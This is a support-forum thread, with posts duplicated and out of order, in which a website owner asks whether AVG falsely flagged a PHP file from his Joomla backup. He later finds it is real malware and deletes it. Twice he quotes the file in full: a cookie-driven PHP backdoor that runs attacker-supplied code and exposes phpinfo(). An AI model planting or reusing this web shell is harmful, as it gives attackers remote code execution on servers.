PHP trojan false positive

Viruses & Threats
1

Hi,

I recently did a complete computer scan with AVG ZEN and it found a 'trojan' in a PHP file that is part of a Joomla package I downloaded when backing up my website.  I found that after reinstating the file and renaming it (with a different extension), AVG still found a trojan.  I've isolated it to the string $_COOKIE, which appears 3 times in the file.  Changing this string to $_COOKI (ie. removing the final E) stopped AVG misidentifying this file.

$_COOKIE is a legitimate PHP variable - why is this flagging up?

11

All,

It is I who should be apologising!  I've found more on this subject at
https://stackoverflow.com/questions/28461492/execute-php-code-from-cookie,
where the same PHP script is discussed.  So it seems AVG correctly identified the file as a trojan, though since I don't have a PHP interpreter on my local machine, it would probably not have done me any harm - but it might explain some odd activity on my website several months ago.
I've now deleted the file completely from my local machine and my website.

Thank you for finding this - I think we can now consider the matter closed.

Regards,
Steve

10

Alok and Alan - many thanks for your quick responses.  I've looked into it further - the file might actually be malware since the $_COOKIE argument of 41bjGEDj3 crops up 4 times in Google, one site being https://malwr.com/analysis/OWQ4MjNlMWQ3YmJiNGEyMGExNjY5NjgyMzE3NDMwOWU/#behavior.  The entire file listing (only 294 bytes) is:

<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Its filename is jtpbs.php, though the other instances on Google have different 5-char filenames with a .PHP extension.  I did a grep on my site's admin, modules and component folders and can't find any call to jtpbs.php, so it seems orphaned.  As a precaution, I've hidden it on my website (by setting permissions to 0000) and allowed AVG to quarantine it on my machine.

None of the references on Google say what harm (if any) it does - but on the other hand, having hidden it on my website, the site still seems to function OK.  I'm not a PHP expert, but I imagine anyone who manages to run phpinfo() on my site would see things I would prefer they didn't!

Any comments?

Regards,
Steve

9

Hello Steve,
I'm sorry to hear about this. You can add the PHP file to AVG exception list (open AVG protection> menu > settings > general > exception), also I request you to submit a false positive sample here (https://secure.avg.com/submit-sample). If the issue still persist, please share a screenshot of the AVG detection page to assist you better. You can check the following link to see the instructions about taking the screenshot (http://support.avg.com/SupportArticleView?urlname=How-to-create-a-screenshot).
Best regards,
Alok.

7

Steve,

Sorry for the inconvenience this may have caused you. To analyze the exact issue, we need to collect some files to resolve it. Please follow these steps to send us diagnostic information from your computer. This information will allow us to analyze the situation and provide you with a solution:

Click the link http://www.avg.com/filedir/util/AVG_SysInfo.exe to download the AVG SysInfo tool.
Run the downloaded tool.
Click Continue to agree with AVG’s license agreement and privacy policy. AVG SysInfo will now gather the necessary data.

6

Hello Steve,
I'm sorry to hear about this. You can add the PHP file to AVG exception list (open AVG protection> menu > settings > general > exception), also I request you to submit a false positive sample here (https://secure.avg.com/submit-sample). If the issue still persist, please share a screenshot of the AVG detection page to assist you better. You can check the following link to see the instructions about taking the screenshot (http://support.avg.com/SupportArticleView?urlname=How-to-create-a-screenshot).
Best regards,
Alok.

8

Steve, If applicable… For your info, just in case that you are unaware, you can post the screenshot here in your topic. Click on 'Answer' & then click on the 'Image' [mountain symbol] & follow the instructions. 
AVG Guru

3

You're welcome Steve,
I'm glad to hear that you have fix the issue. Feel free to contact us again if you need any further assistance.
Best regards,
Alok.

2

Once the diagnostic output is ready, you may add comments, or click Attach file or Screenshot to provide us with additional information.
Fill in your email address
Fill in the case # which is 04919509 by copying and pasting it from this email
Click send output
Reply to the email and let us know that the data has been successfully sent. Please do not modify the email subject
As soon as we receive the data, we will analyze the files and provide you with further information.

4

Alok and Alan - many thanks for your quick responses.  I've looked into it further - the file might actually be malware since the $_COOKIE argument of 41bjGEDj3 crops up 4 times in Google, one site being https://malwr.com/analysis/OWQ4MjNlMWQ3YmJiNGEyMGExNjY5NjgyMzE3NDMwOWU/#behavior.  The entire file listing (only 294 bytes) is:

<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Its filename is jtpbs.php, though the other instances on Google have different 5-char filenames with a .PHP extension.  I did a grep on my site's admin, modules and component folders and can't find any call to jtpbs.php, so it seems orphaned.  As a precaution, I've hidden it on my website (by setting permissions to 0000) and allowed AVG to quarantine it on my machine.

None of the references on Google say what harm (if any) it does - but on the other hand, having hidden it on my website, the site still seems to function OK.  I'm not a PHP expert, but I imagine anyone who manages to run phpinfo() on my site would see things I would prefer they didn't!

Any comments?

Regards,
Steve

5

All,

It is I who should be apologising!  I've found more on this subject at
https://stackoverflow.com/questions/28461492/execute-php-code-from-cookie,
where the same PHP script is discussed.  So it seems AVG correctly identified the file as a trojan, though since I don't have a PHP interpreter on my local machine, it would probably not have done me any harm - but it might explain some odd activity on my website several months ago.
I've now deleted the file completely from my local machine and my website.

Thank you for finding this - I think we can now consider the matter closed.

Regards,
Steve